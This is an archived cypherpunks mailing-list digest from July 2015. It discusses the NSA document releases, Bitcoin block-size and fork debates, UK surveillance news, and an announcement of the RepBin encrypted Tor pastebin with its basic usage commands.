From Rayzer at riseup.net Wed Jul 1 15:06:13 2015
From: Rayzer at riseup.net (Razer)
Date: Wed, 01 Jul 2015 15:06:13 -0700
Subject: The Intercept Releases ~1,264 pages of NSA Docs
In-Reply-To:
References:
Message-ID: <55946455.8070004@riseup.net>

On 07/01/2015 02:47 PM, John Young wrote:
> Mostly Xkeyscore and more.
>
> http://cryptome.org/2015/07/nsa-xks-more-intercept-15-0701.7z (643MB)
>
> List of files:
>
> https://pbs.twimg.com/media/CI3AatNUsAExiNV.jpg:large

The Intercept also published a detailed description and infographic of
the NSA's own Foreign/Domestic Surveillance "Google" today.

https://firstlook.org/theintercept/2015/07/01/nsas-google-worlds-private-communications/

From grarpamp at gmail.com Wed Jul 1 13:05:27 2015
From: grarpamp at gmail.com (grarpamp)
Date: Wed, 1 Jul 2015 16:05:27 -0400
Subject: Amazon TLS implementation
Message-ID:

https://github.com/awslabs/s2n

s2n is a C99 implementation of the TLS/SSL protocols that is designed to
be simple, small, fast, and with security as a priority. It is released
and licensed under the Apache Software License 2.0.

From jya at pipeline.com Wed Jul 1 14:47:53 2015
From: jya at pipeline.com (John Young)
Date: Wed, 01 Jul 2015 17:47:53 -0400
Subject: The Intercept Releases ~1,264 pages of NSA Docs
Message-ID:

Mostly Xkeyscore and more.

http://cryptome.org/2015/07/nsa-xks-more-intercept-15-0701.7z (643MB)

List of files:

https://pbs.twimg.com/media/CI3AatNUsAExiNV.jpg:large

From jya at pipeline.com Wed Jul 1 17:00:41 2015
From: jya at pipeline.com (John Young)
Date: Wed, 01 Jul 2015 20:00:41 -0400
Subject: The Intercept Releases ~1,264 pages of NSA Docs
In-Reply-To: <20150701230531.GH7143@ctrlc.hu>
References: <1435791099.1299973.313067361.06F57DFB@webmail.messagingengine.com> <20150701230531.GH7143@ctrlc.hu>
Message-ID:

The Intercept doesn't sign Snowden files, just posts them on DocumentCloud.
Best would be for Snowden to sign them if to be signed, journalists do not
have capability to do it, and most could care less except to blow smoke
about certification. Their lawyers advise to not certify anything leaked to
them, too risky.

Same procedure by all the journalist-publisher users of DocumentCloud; it
is restricted to journalists-publishers, whom it is well known are quite
slack about comsec, infosec and their customers' privacy in order to
maximize profitability of user data for advertisers.

DocumentCloud, now hosting over 700,000 documents of millions of
pages, is rather easily penetrated and tampered with, but that's to be
expected of anything hosted on the cloud which has the world's worst
security. Worser: logs of accesses are kept and shared to authorities.

Cloud may be the most grievously harmer of privacy today, soon to be
surpassed by the IoT to exploit user's gullibility with promises of oh so
popular faulty security measures and irresponsibly shady privacy policies.

At 07:05 PM 7/1/2015, stef wrote:
>On Thu, Jul 02, 2015 at 08:51:39AM +1000, Alfie John wrote:
> > On Thu, Jul 2, 2015, at 07:47 AM, John Young wrote:
> > > Mostly Xkeyscore and more.
> > >
> > > http://cryptome.org/2015/07/nsa-xks-more-intercept-15-0701.7z (643MB)
> >
> > Is there an md5sum of that link served via HTTPS?
>
>i'd rather prefer the intercept itself actually releasing this as a signed
>archive.
>
>--
>otr fp: https://www.ctrlc.hu/~stef/otr.txt

From jya at pipeline.com Wed Jul 1 17:26:02 2015
From: jya at pipeline.com (John Young)
Date: Wed, 01 Jul 2015 20:26:02 -0400
Subject: The Intercept Releases ~1,264 pages of NSA Docs
In-Reply-To:
References: <1435791099.1299973.313067361.06F57DFB@webmail.messagingengine.com> <20150701230531.GH7143@ctrlc.hu>
Message-ID:

BTW, The Intercept documents can be downloaded from DocumentCloud:

http://www.documentcloud.org/public/search/group:%20the-intercept

The recent large batch is listed from June 29 to July 1, 2015.

Click on number of pages which brings up thumbnails, then click the
first page thumbnail to bring up viewing pages, then on the right
column right click to download the original document.

Documents of any other journalist outlet can be found "Group."

From z9wahqvh at gmail.com Wed Jul 1 18:41:53 2015
From: z9wahqvh at gmail.com (z9wahqvh)
Date: Wed, 1 Jul 2015 21:41:53 -0400
Subject: The Intercept Releases ~1,264 pages of NSA Docs
In-Reply-To:
References: <1435791099.1299973.313067361.06F57DFB@webmail.messagingengine.com> <20150701230531.GH7143@ctrlc.hu>
Message-ID:

Snowden can't really sign the files if he has absolutely no access to them,
which is a critical part of the current story, otherwise we'd be right to
worry about his proximity to the FSB.

On Wed, Jul 1, 2015 at 8:00 PM, John Young wrote:

> The Intercept doesn't sign Snowden files, just posts them on DocumentCloud.
> Best would be for Snowden to sign them if to be signed, journalists do not
> have capability to do it, and most could care less except to blow smoke
> about certification. Their lawyers advise to not certify anything leaked to
> them, too risky.
>
> Same procedure by all the journalist-publisher users of DocumentCloud; it
> is restricted to journalists-publishers, whom it is well known are quite
> slack about comsec, infosec and their customers' privacy in order to
> maximize profitability of user data for advertisers.
>
> DocumentCloud, now hosting over 700,000 documents of millions of
> pages, is rather easily penetrated and tampered with, but that's to be
> expected of anything hosted on the cloud which has the world's worst
> security. Worser: logs of accesses are kept and shared to authorities.
>
> Cloud may be the most grievously harmer of privacy today, soon to be
> surpassed by the IoT to exploit user's gullibility with promises of oh so
> popular faulty security measures and irresponsibly shady privacy policies.
>
> At 07:05 PM 7/1/2015, stef wrote:
>
>> On Thu, Jul 02, 2015 at 08:51:39AM +1000, Alfie John wrote:
>> > On Thu, Jul 2, 2015, at 07:47 AM, John Young wrote:
>> > > Mostly Xkeyscore and more.
>> > >
>> > > http://cryptome.org/2015/07/nsa-xks-more-intercept-15-0701.7z (643MB)
>> >
>> > Is there an md5sum of that link served via HTTPS?
>>
>> i'd rather prefer the intercept itself actually releasing this as a signed
>> archive.
>>
>> --
>> otr fp: https://www.ctrlc.hu/~stef/otr.txt
>>

From s at ctrlc.hu Wed Jul 1 16:05:31 2015
From: s at ctrlc.hu (stef)
Date: Thu, 2 Jul 2015 01:05:31 +0200
Subject: The Intercept Releases ~1,264 pages of NSA Docs
In-Reply-To: <1435791099.1299973.313067361.06F57DFB@webmail.messagingengine.com>
References: <1435791099.1299973.313067361.06F57DFB@webmail.messagingengine.com>
Message-ID: <20150701230531.GH7143@ctrlc.hu>

On Thu, Jul 02, 2015 at 08:51:39AM +1000, Alfie John wrote:
> On Thu, Jul 2, 2015, at 07:47 AM, John Young wrote:
> > Mostly Xkeyscore and more.
> >
> > http://cryptome.org/2015/07/nsa-xks-more-intercept-15-0701.7z (643MB)
>
> Is there an md5sum of that link served via HTTPS?

i'd rather prefer the intercept itself actually releasing this as a signed
archive.

--
otr fp: https://www.ctrlc.hu/~stef/otr.txt

From alfiej at fastmail.fm Wed Jul 1 15:51:39 2015
From: alfiej at fastmail.fm (Alfie John)
Date: Thu, 02 Jul 2015 08:51:39 +1000
Subject: The Intercept Releases ~1,264 pages of NSA Docs
In-Reply-To:
References:
Message-ID: <1435791099.1299973.313067361.06F57DFB@webmail.messagingengine.com>

Hey John,

On Thu, Jul 2, 2015, at 07:47 AM, John Young wrote:
> Mostly Xkeyscore and more.
>
> http://cryptome.org/2015/07/nsa-xks-more-intercept-15-0701.7z (643MB)

Is there an md5sum of that link served via HTTPS?

Alfie

--
Alfie John
alfiej at fastmail.fm

From cathalgarvey at cathalgarvey.me Thu Jul 2 01:08:41 2015
From: cathalgarvey at cathalgarvey.me (Cathal Garvey)
Date: Thu, 2 Jul 2015 09:08:41 +0100
Subject: The Intercept Releases ~1,264 pages of NSA Docs
In-Reply-To: <1435791099.1299973.313067361.06F57DFB@webmail.messagingengine.com>
References: <1435791099.1299973.313067361.06F57DFB@webmail.messagingengine.com>
Message-ID: <5594F189.6030807@cathalgarvey.me>

..which would provide what, exactly? :)

Surely sir you mean sha512sum?

On 01/07/15 23:51, Alfie John wrote:
> Hey John,
>
> On Thu, Jul 2, 2015, at 07:47 AM, John Young wrote:
>> Mostly Xkeyscore and more.
>>
>> http://cryptome.org/2015/07/nsa-xks-more-intercept-15-0701.7z (643MB)
>
> Is there an md5sum of that link served via HTTPS?
>
> Alfie
>

--
Scientific Director, IndieBio Irish Programme
Now running in Cork, Ireland May->July
Learn more at indieb.io and follow along!
Twitter: @onetruecathal
Phone: +353876363185
miniLock: JjmYYngs7akLZUjkvFkuYdsZ3PyPHSZRBKNm6qTYKZfAM
peerio.com: cathalgarvey

From rysiek at hackerspace.pl Thu Jul 2 02:28:47 2015
From: rysiek at hackerspace.pl (rysiek)
Date: Thu, 02 Jul 2015 11:28:47 +0200
Subject: progression of technologies
In-Reply-To: <55906E0F.5020702@pilobilus.net>
References: <20150625032613.48665228148@palinka.tinho.net> <2117510.FiH18N24he@lapuntu> <55906E0F.5020702@pilobilus.net>
Message-ID: <1842658.zh3VyRJx1L@lapuntu>

On Sunday, 28 June 2015 17:58:39 Steve Kinney wrote:
> >> The age of privacy, and everything with it, including the
> >> freedom of association and separation of public and private
> >> life, is ending. The public is smiling merrily along the
> >> road. 1984 is coming, but the public is not scared or
> >> suppressed. They are smiling happy people, obedient and
> >> cheerful, and they take the best of care of their keepers.
>
> The end of "privacy as we know it" is only a dystopian scenario if
> the institutions of authoritarian governance survive in the
> post-privacy world. I don't believe they can survive, because the
> same network infrastructure that has already made so much formerly
> "private" information public also shifts the balance of power away
> from established institutions in fundamental ways.

I'm afraid, unfortunately, that the head start we got by jumping on this
Internet thingy early on and figuring shit out is slowly running out. The NSA
and the rest of Five Eyes figured this shit out now, too -- along with "oh
wait, there was no privacy-by-design anywhere? that's cute". And they have a
much, much bigger budget.

Between that, and the populace being herded by "EHRMAHGEHRD TEHRRISTS!" on one
hand and "privacy is gone, baby" on the other, we are not winning this one
right now.

> Keeping State and Corporate secrets out of public view is becoming
> progressively more difficult, while the mechanism of ad-hoc self
> organizing "smart mob" actions arising from the public at large is
> an emergent challenge to established power centers. If and as
> these trends continue to accelerate, the nature of political power
> will eventually be transformed.

That's why "hackers", "hacktivists" and "Anonymous" are used as synonyms of
"terrorists" by the powers that are. And the media.

--
Regards,
Michał "rysiek" Woźniak

I am changing my GPG key :: http://rys.io/pl/147
GPG Key Transition :: http://rys.io/en/147

From rysiek at hackerspace.pl Thu Jul 2 02:38:54 2015
From: rysiek at hackerspace.pl (rysiek)
Date: Thu, 02 Jul 2015 11:38:54 +0200
Subject: [Bitcoin-development] questions about bitcoin-XT code fork & non-consensus hard-fork
In-Reply-To:
References: <20150616081131.GL10743@leitl.org> <1741267.YsnpBZuTEf@lapuntu>
Message-ID: <1723765.Bfy9H6RHV9@lapuntu>

On Sunday, 28 June 2015 20:52:43 Sean Lynch wrote:
> Wow, that's a low blow. Arguing by authority, and then a false dichotomy:
> "either you know more about Bitcoin than X, or you should not have a voice
> at all on this"
>
> Might I suggest considering arguing on the merits instead, next time? :)
>
> Perhaps if you bothered to read more than the last message in the thread
> you would realize that I already attempted that. I think your expectations
> are a bit high when there are people on the thread arguing that we should
> really consider the opinions of those making death threats. IOW listen to
> the terrorists.

But that's exactly why I was so surprised.
I filter out the people that make no sense or death threats, but when I see a
person that usually seems to make sense, and yet lands a straw man, I'm taken
aback. :)

> It seems to me that people are terrified by a hard fork because they have a
> huge stake in Bitcoin. To me that's the best argument there could possibly
> be to fork now and get it out of the way. Bitcoin can't survive if it
> ossifies due to the fears of morons who can't be bothered to diversify
> their investment, and who have such low morals that they'd stoop to making
> death threats.

Fair point.

> If we're going to argue based on the merits then let's do that, and leave
> the death threats and doom and gloom out of it. We need to be thinking
> beyond Bitcoin to the future of cryptocurrencies in general, and a healthy
> cryptocurrencies ecosystem cannot survive as an ossified monoculture.

The question is: can the *cryptocurrency* ecosystem survive if BitCoin
hard-forks. Some say "no, because loss of trust"; some say "yeah, it will
actually grow strong". I'm not convinced either way.

--
Regards,
Michał "rysiek" Woźniak

I am changing my GPG key :: http://rys.io/pl/147
GPG Key Transition :: http://rys.io/en/147

From rysiek at hackerspace.pl Thu Jul 2 02:46:19 2015
From: rysiek at hackerspace.pl (rysiek)
Date: Thu, 02 Jul 2015 11:46:19 +0200
Subject: Privacy advocates resign over facial recognition plans
In-Reply-To: <5591A49E.4040204@riseup.net>
References: <2307550.aktsLoVmFc@lapuntu> <5591A49E.4040204@riseup.net>
Message-ID: <19407322.87nTAoSQ5D@lapuntu>

On Monday, 29 June 2015 13:03:42 Razer wrote:
> On 06/28/2015 10:57 AM, rysiek wrote:
> > But maybe we can find ways to raise the cost of surveillance?
>
> I'm still considering sending encrypted pics of lulzcats with every
> mundane email I send to force the NSA to store it for 'perpetuity'.

Hah, good call.

> "and if 50 people a day walked in, sang a bar of Alice's Restaurant, and
> walked out, they MIGHT think it was a movement" ~Arlo Guthrie

+1 :)

--
Regards,
Michał "rysiek" Woźniak

I am changing my GPG key :: http://rys.io/pl/147
GPG Key Transition :: http://rys.io/en/147

From coderman at gmail.com Thu Jul 2 17:43:02 2015
From: coderman at gmail.com (coderman)
Date: Thu, 2 Jul 2015 17:43:02 -0700
Subject: [Bitcoin-development] questions about bitcoin-XT code fork & non-consensus hard-fork
In-Reply-To:
References: <20150616081131.GL10743@leitl.org> <1741267.YsnpBZuTEf@lapuntu> <1723765.Bfy9H6RHV9@lapuntu>
Message-ID:

On 7/2/15, Lodewijk andré de la porte wrote:
> ...
> So.. these points were already hard to argue against clearly. Then there's
> "we can scale externally".... The trouble is that there's so many ways,
> like pinning (sidechains/mastercoin), exclusively inter-institutional
> settlement, debt based moneys ("the bearer of this token is entitled
> to..."), and all of them could work! In fact, we could just abandon Bitcoin
> altogether!
> ...
> And that's the core of my counterargument: we don't have to
> cripple Bitcoin, so let's not.

thank you for the patient summarization of many complex points of
contention around this subject, including the social(market) aspects
which may not come easy to a technical mind.

> The Chinese mining pools stamping their document regarding increasing the
> blocksize to 8mb was extraordinary. They ignored Gavin's 20mb or anything
> proposal ("or anything" probably mostly to make 20mb seem reasonable).
> They stamped - a thing completely outdated in the West, yet common in
> Asia (and pretty badass). They are a group of Chinese making law for
> everyone.

speaking of "not much to do about it now..." :)

> So - conclusively - Gavin is a hero, the Internet's retarded, Bitcoin is in
> policy jail but it likes it there. Oh, and the free-est market of the world
> is already significantly run by Chinese. If you read this far, thanks.

agreed. onward to proof of useful work!
[sounds trivial, let's r/AskReddit! ...]

best regards,

From alfiej at fastmail.fm Thu Jul 2 01:23:23 2015
From: alfiej at fastmail.fm (Alfie John)
Date: Thu, 02 Jul 2015 18:23:23 +1000
Subject: The Intercept Releases ~1,264 pages of NSA Docs
In-Reply-To: <5594F189.6030807@cathalgarvey.me>
References: <1435791099.1299973.313067361.06F57DFB@webmail.messagingengine.com> <5594F189.6030807@cathalgarvey.me>
Message-ID: <1435825403.2763717.313350353.3F42FCF7@webmail.messagingengine.com>

On Thu, Jul 2, 2015, at 06:08 PM, Cathal Garvey wrote:
> ..which would provide what, exactly? :)
>
> Surely sir you mean sha512sum?
>
> > Is there an md5sum of that link served via HTTPS?

Sorry, muscle memory kicked in. Good pickup!

Alfie

--
Alfie John
alfiej at fastmail.fm

From coderman at gmail.com Thu Jul 2 19:34:09 2015
From: coderman at gmail.com (coderman)
Date: Thu, 2 Jul 2015 19:34:09 -0700
Subject: [Bitcoin-development] questions about bitcoin-XT code fork & non-consensus hard-fork
In-Reply-To:
References: <20150616081131.GL10743@leitl.org> <1741267.YsnpBZuTEf@lapuntu> <1723765.Bfy9H6RHV9@lapuntu>
Message-ID:

On 7/2/15, coderman more bullshit...:
> ...

btw, actual consensus hard fork - early days of bitcoin you get a
badtx/freminehack it was possible and tractable to manage a
coordinated, voluntary consensus move to specific re-wind, specific
revision, and resume.

it took exceptional circumstances - and as per thread above and long
discussions elsewhere, there is nothing nearly so dire facing BTC's
present or near future.

beyond that, who can say with confidence? including those proposing
unprecedented actions against consensus?

if i was back in FR for the fourth, i'd have some of this tenderized
horse corpse for meal. instead, end of my opinion here.

best regards,

From grarpamp at gmail.com Thu Jul 2 23:35:37 2015
From: grarpamp at gmail.com (grarpamp)
Date: Fri, 3 Jul 2015 02:35:37 -0400
Subject: Brits: Cameron swats at crypto again, GCHQ spies Amnesty
Message-ID:

http://arstechnica.co.uk/tech-policy/2015/07/cameron-reaffirms-there-will-be-no-safe-spaces-from-uk-government-snooping/

http://betanews.com/2015/07/02/uk-government-illegally-spied-on-amnesty-international/

From l at odewijk.nl Thu Jul 2 16:24:20 2015
From: l at odewijk.nl (Lodewijk andré de la porte)
Date: Fri, 3 Jul 2015 08:24:20 +0900
Subject: [Bitcoin-development] questions about bitcoin-XT code fork & non-consensus hard-fork
In-Reply-To: <1723765.Bfy9H6RHV9@lapuntu>
References: <20150616081131.GL10743@leitl.org> <1741267.YsnpBZuTEf@lapuntu> <1723765.Bfy9H6RHV9@lapuntu>
Message-ID:

2015-07-02 18:38 GMT+09:00 rysiek :

> On Sunday, 28 June 2015 20:52:43 Sean Lynch wrote:
> > Wow, that's a low blow. Arguing by authority, and then a false dichotomy:
> > "either you know more about Bitcoin than X, or you should not have a
> > voice at all on this"
> >
> > Might I suggest considering arguing on the merits instead, next time? :)
> >
> > Perhaps if you bothered to read more than the last message in the thread
> > you would realize that I already attempted that. I think your
> > expectations are a bit high when there are people on the thread arguing
> > that we should really consider the opinions of those making death
> > threats. IOW listen to the terrorists.
>
> But that's exactly why I was so surprised.
> I filter out the people that make
> no sense or death threats, but when I see a person that usually seems to
> make sense, and yet lands a straw man, I'm taken aback. :)
>

Saying Gavin knows quite a lot about Bitcoin is not an argument of
authority. It doesn't make him right, but it does make him very likely to
be right. Certainly more likely than the heapings of shitty arguments,
especially those that are technically disconnected from what bitcoin is.

When you listen to the arguments about blocksize it usually goes something
like:

Pro:
* Cheaper transactions
* More truly Bitcoin transactions
* Simplest way to scale

There's some derivative arguments regarding poor people's access to Bitcoin
and a herd of applications that just require cheap access to the
blockchain. I think the most noteworthy argument is:
* Bitcoin becomes more competitive/attractive as a result of cheaper
  transactions

Con:
* We can already fit quite some txs
* the blockchain will be less wieldable
* the bandwidth required to keep up with the blockchain (regardless of
  storage) will increase
* we can scale externally

The derivative arguments here are also poor people's access to Bitcoin, wrt
bandwidth, but the argument holds up much worse as SPV would work just fine
over those rare very slow connections. Then there's a lot of downright
fearmongering like "only institutions will run full nodes". Economically
that's just not true, and technologically it's not important - crypto
features allow usability immediately (simplified (commercial) APIs, "blind"
tx broadcasting), strong guarantees *very* quickly (SPV), and certainty and
independence if you'd like it (a pruning full node), and history novelty at
only minor hassle (less than a day's work). Even a 100 fold increase in
blocksize would not radically change this.

It's pretty annoying to have an even bigger blockchain, don't get me wrong
on that, but that's just the way Bitcoin works: a blockchain that grows
with use.
There's no reason for it to truly upset you, either. Running a
full node is already something you don't do for no reason at all. I can't
really make this argument as well as I like. The point is that if you have
a reason you would still do it later, and if you don't you don't already.
Some people noted that the pruning makes it possible to run a full node on
their phones. Cool! But there's no reason to. In fact, you won't because
it'd drain your battery. We'll be okay without the one silly geek that does
it anyway.

So.. these points were already hard to argue against clearly. Then there's
"we can scale externally".... The trouble is that there's so many ways,
like pinning (sidechains/mastercoin), exclusively inter-institutional
settlement, debt based moneys ("the bearer of this token is entitled
to..."), and all of them could work! In fact, we could just abandon Bitcoin
altogether!

And that's the core of my counterargument: we don't have to
cripple Bitcoin, so let's not. Let's not make it more complicated than it
has to be. If we do scale externally, let it be for exceedingly good
reasons and at exceedingly competitive prices.

Mostly I see people haggling over nothing on Reddit, and even here. There's
also confusion about roles in the Bitcoin ecosystem, and about ideals. Then
there's confusion about consent, and how to manage it. It's probably
because all those things are badly fleshed out. Hard-to-achieve consensus
has advantages; Bitcoin will be technologically stable. The roles will
shift anyway. Ideals are not inherent, only cold hard currency is. Its
implications depend on culture and math, both generally not very well
understood. Reddit has never been conducive to quality argument - at
fantastic loss to everyone but the populists.

I think, ultimately, that giving Gavin ultimate authority for 10 years then
freezing the whole ordeal would probably work out rather well. I think it's
ran afoul of his control too soon. We already have some weird bugs in
Bitcoin.
Then there's some strange (unstudied) economical effects like the
halving (and why not gradual decrease?). I'm sure lots of people found
similar oddities from their perspectives. There's just not much to do about
it anymore now.

The Chinese mining pools stamping their document regarding increasing the
blocksize to 8mb was extraordinary. They ignored Gavin's 20mb or anything
proposal ("or anything" probably mostly to make 20mb seem reasonable). They
stamped - a thing completely outdated in the West, yet common in Asia (and
pretty badass). They are a group of Chinese making law for everyone.
(not-a-magnet-or-similar-document-oriented-link:
http://i.imgur.com/JUnQcue.jpg)

Gavin appeased them and provided for unattended growth with a period 8mb
increase. Smart move.

So - conclusively - Gavin is a hero, the Internet's retarded, Bitcoin is in
policy jail but it likes it there. Oh, and the free-est market of the world
is already significantly run by Chinese. If you read this far, thanks.

From andreas at junius.info Fri Jul 3 00:04:06 2015
From: andreas at junius.info (Andreas Junius)
Date: Fri, 03 Jul 2015 16:34:06 +0930
Subject: Brits: Cameron swats at crypto again, GCHQ spies Amnesty
In-Reply-To:
References:
Message-ID: <559633E6.3070601@junius.info>

Funnily enough, terrorists aren't using e-mail anyway. They announce
their attacks and the results on facebook and twitter for everyone to read.

http://www.peemail.org/

On 03/07/15 16:05, grarpamp wrote:
> http://arstechnica.co.uk/tech-policy/2015/07/cameron-reaffirms-there-will-be-no-safe-spaces-from-uk-government-snooping/
>
> http://betanews.com/2015/07/02/uk-government-illegally-spied-on-amnesty-international/

From odinn.cyberguerrilla at riseup.net Fri Jul 3 16:55:24 2015
From: odinn.cyberguerrilla at riseup.net (odinn)
Date: Fri, 03 Jul 2015 16:55:24 -0700
Subject: [cryptome] NYT on Nick Szabo and Bitcoin
In-Reply-To:
References:
Message-ID: <559720EC.4050708@riseup.net>

Are they still at it?

Boring.

On 05/18/2015 09:51 AM, JS733NknRj6J wrote:
> I seem to vaguely remember this profile (or one like it) but can't
> turn it up myself. Would be very grateful for the link if you do
> repost it.
>
> - JS7
>
> Sent from ProtonMail, encrypted email based
> in Switzerland.
>
> -------- Original Message --------
> Subject: Re: [cryptome] NYT on Nick Szabo and Bitcoin
> Time (GMT): May 18 2015 13:13:12
> From: wilfred at vt.edu
> To: cryptome at freelists.org
> CC: cypherpunks at cpunks.org, cryptography at metzdowd.com,
> cryptography at randombit.net
>
> We did a context profile on Satoshi with analysis of intel-based
> datacenter profiles and certain known patterns from the USSS
> (Treasury Fincen) crew you like so much at Yale and another
> specific MI5 ish unit whom you remember from Anguilla. The
> analysis clustered age and language patterns and identified a very
> tight range of character and background with institutional intent,
> then modeled the propaganda influence that gave rise to the BTC
> trend. The analysis was posted on the forums and pdf, but are
> missing from search. We will repost the original and add some
> current profile analysis.
> In short, the character is a 20s 2-year
> AS pre-law 1811 (police) with distinct interest in using US/UK and
> new international law *pyramid scheme policies to take over global
> legacy datacenters* in criminal forfeiture cases. Another party did
> a review of law&policy influencers of the same market and
> similarly isolated the core group. (no need to mention
> DEA+FINCEN.)
>
> On Sunday, May 17, 2015, John Young wrote:
>
> nytimes.com/2015/05/17/business/decoding-the-enigma-of-satoshi-nakamoto-and-the-birth-of-bitcoin.html
>
> Those around cypherpunks 1993-1998 will recall Szabo's emails on
> bitcoin early precursors along with Adam Back, Hal Finney, Tim
> May, Wei Dai, Lucky Green, Hettinga, many more burgeoning F-Cs.
> NYT piece credits cpunks as subversive birther, now being
> hyper-monetized by arch-cryptoanarchist Goldman Sachs and many more
> centralists.
>
> Szabo denies being Satoshi, but ... others rush to fill the gap
>

--
http://abis.io ~
"a protocol concept to enable decentralization
and expansion of a giving economy, and a new social good"
https://keybase.io/odinn

From list at sysfu.com Sat Jul 4 08:08:00 2015
From: list at sysfu.com (Seth)
Date: Sat, 04 Jul 2015 08:08:00 -0700
Subject: There's this really kewl mesh network that's being deployed world-wide...
Message-ID:

...have you heard about it?

No? Well...odds are you've already given implied consent for the IoT.

https://www.youtube.com/watch?v=0hJqs1jwAPc

From jya at pipeline.com Sat Jul 4 07:44:44 2015
From: jya at pipeline.com (John Young)
Date: Sat, 04 Jul 2015 10:44:44 -0400
Subject: Bitcoin Book Review
Message-ID:

http://www.nytimes.com/2015/07/05/books/review/nathaniel-poppers-digital-gold-looks-at-bitcoin.html?ref=books&_r=0

Quote:

The most poignant moment in the book comes when Popper contrasts a
conference for the more ideologically minded Bitcoiners at a racetrack
on the outskirts of Austin, where Ulbricht grew up, with the gathering
of the rich and powerful at the South by Southwest festival, where
Ulbricht’s mother is politely dismissed as she pleads for funds to help
defray her son’s legal costs. It was an “unhappy reminder of a side of
Bitcoin” that its new adherents “wanted to put behind them,” Popper
writes. And as he notes, “If this was the new world, it didn’t seem all
that different from the old one - at least not yet.”

Nor can “Digital Gold” be a tale with a satisfying ending, because the
future of Bitcoin is unknowable right now. As the venture capitalist
Barry Silbert says at a Goldman Sachs conference, Bitcoin “is either
going to change everything, or nothing.” But if Bitcoin doesn’t change
everything, people will keep trying to find something that will, and so
Popper’s book stands as necessary reading, and very intriguing at that,
regardless of the eventual fate of his subject.

Unquote.

From ryan.pear at ownbay.net Sat Jul 4 09:14:20 2015
From: ryan.pear at ownbay.net (ryan.pear at ownbay.net)
Date: Sat, 04 Jul 2015 16:14:20 +0000
Subject: Announcement: Replicated Encrypted PasteBin
Message-ID:

It's been a while since code was announced on cypherpunks...

RepBin: https://github.com/repbin/repbin/tree/v0.0.1

Repbin is an encrypted pastebin for the command line that runs over Tor!
Repbin servers form a distributed network where nodes sync posts with each
other (like in Usenet or BBS/Fido systems). This makes Repbin resilient and
scalable.
Repbin focuses on privacy (encrypted messages) and anonymity
(padding and repost chains).

Features
--------

- Forward secure encryption of posts using DHE-curve25519. Even a
  compromised long-term key does not allow to decrypt old posts.
- Integrity protection of posts using HMAC-SHA256. You can be sure that
  posts have not been tampered with.
- Confidentiality of posts using AES256-CTR. Without the recipient key,
  nobody can read the post.
- All posts are padded to a common size. That means that posts are not
  distinguishable by their size when looking ``on the wire''.
- Posts are replicated between all servers in the Repbin network.
- Optional constant receiver keys for post-box functionality.
- Receiver key attributes for synchronization and post-box authentication.
- Resource control via hashcash (sha256) and ed25519.
- Some privacy protection by using Tor for all communication and ephemeral
  keys.
- undocumented goodies.

Post a file
-----------

    $ cat FILE | repclient

As a response you will receive output like this:

    Pastebin Address: http://bvuk3xmvslx3idcj.onion/3x77hJtt42MkGbs18e1ZvBw9oAftAUrr9K9x4E8rQzed_2PGBikD5hEcXh7kT4vtKPsZuwymWMeBNeGiRpQ24upB3

Simply give the Pastebin Address to whoever should gain access to the file.

Fetch:

    $ repclient http://bvuk3xmvslx3idcj.onion/3x77hJtt42MkGbs18e1ZvBw9oAftAUrr9K9x4E8rQzed_2PGBikD5hEcXh7kT4vtKPsZuwymWMeBNeGiRpQ24upB3

Installation
------------

Client software to send and receive file:

    $ go get -u github.com/repbin/repbin/cmd/repclient

Peering
-------

If you are an experienced UNIX sysadmin, please consider running your own
Repbin server to help the Repbin network. While running a server requires
hardly any interaction, setting up a server in the Repbin network requires
at least one manual peering agreement with another server in the network.
This is a time-tested architecture which is used successfully to run the
Internet, the Usenet, and BBS networks like FidoNet.
To set up a peering you have to exchange public peering keys with another server and configure your server accordingly. To get in touch with us for peering send a message to

7VW3oPLzQc7VS2anLyDtrdARDdSwa7QTF7h3N2t6J2VN_AjWZQfHoqK3yNqvXPkcswLNXSzFrCzJuRRKZKvY71UWT

and don't forget to put your own key into the message. The server installation and the peering process is described in detail in the documentation.

Here be dragons...
------------------

Dive deeper into the documentation and the code, if you want to figure out how to send repost messages (remailer style) and how to run your own reposter service!

WARNING
-------

THIS SOFTWARE HAS NEVER BEEN AUDITED OR REVIEWED. IT HAS NOT BEEN TESTED. THE AUTHORS ARE AMATEURS AND YOU SHOULD NOT USE THIS SOFTWARE FOR ANYTHING IMPORTANT. YOU SHOULD NOT RELY ON THE SOFTWARE TO WORK AT ALL, OR IN ANY PREDICTABLE WAY, NOR SHOULD YOU ASSUME THAT THE FEATURES CLAIMED ARE THE FEATURES IMPLEMENTED. THIS SOFTWARE IS FULL OF ERRORS, THE ARCHITECTURE AND DESIGN ARE BROKEN. UNLESS SOME EXPERT CLAIMS OTHERWISE.

From juan.g71 at gmail.com Sat Jul 4 12:39:55 2015
From: juan.g71 at gmail.com (Juan)
Date: Sat, 4 Jul 2015 16:39:55 -0300
Subject: SR - was Bitcoin Book Review
In-Reply-To:
References:
Message-ID: <5598367f.8612370a.5415.4479@mx.google.com>

On Sun, 5 Jul 2015 00:09:45 +0900 Lodewijk andré de la porte wrote:

> It's his own bloody fault for staying in the US, too! Go
> teach English in China for a while or something. Give'm a challenge!

Perhaps, when he realized that he shouldn't be running a black market while living in the US, it was too late. The person who wrote under the DPR nickname in the silk road forum seemed to believe that he was protected by the pentagon's fake anonymity network (aka tor) and that the government was too stupid to get him...

From coderman at gmail.com Sat Jul 4 22:25:14 2015
From: coderman at gmail.com (coderman)
Date: Sat, 4 Jul 2015 22:25:14 -0700
Subject: speaking of Bitcoin ...
the july4th split
Message-ID:

sometimes even consensus not enough, [ failure at 95% agreement! ]

SPV is a compensating measure that addresses block size without reifying incompatibilities. however, with drawbacks and risk, as taken on chin in this one:

https://bitcoin.org/en/alert/2015-07-04-spv-mining

"""
Summary: Some miners are currently generating invalid blocks. Almost all software (besides Bitcoin Core 0.9.5 and later) will accept these invalid blocks under certain conditions. The paragraphs that follow explain the cause more thoroughly.

For several months, an increasing amount of mining hash rate has been signaling its intent to begin enforcing BIP66 strict DER signatures. As part of the BIP66 rules, once 950 of the last 1,000 blocks were version 3 (v3) blocks, all upgraded miners would reject version 2 (v2) blocks.

Early morning UTC on 4 July 2015, the 950/1000 (95%) threshold was reached. Shortly thereafter, a small miner (part of the non-upgraded 5%) mined an invalid block--as was an expected occurrence. Unfortunately, it turned out that roughly half the network hash rate was mining without fully validating blocks (called SPV mining), and built new blocks on top of that invalid block.

Note that the roughly 50% of the network that was SPV mining had explicitly indicated that they would enforce the BIP66 rules. By not doing so, several large miners have lost over $50,000 dollars worth of mining income so far.

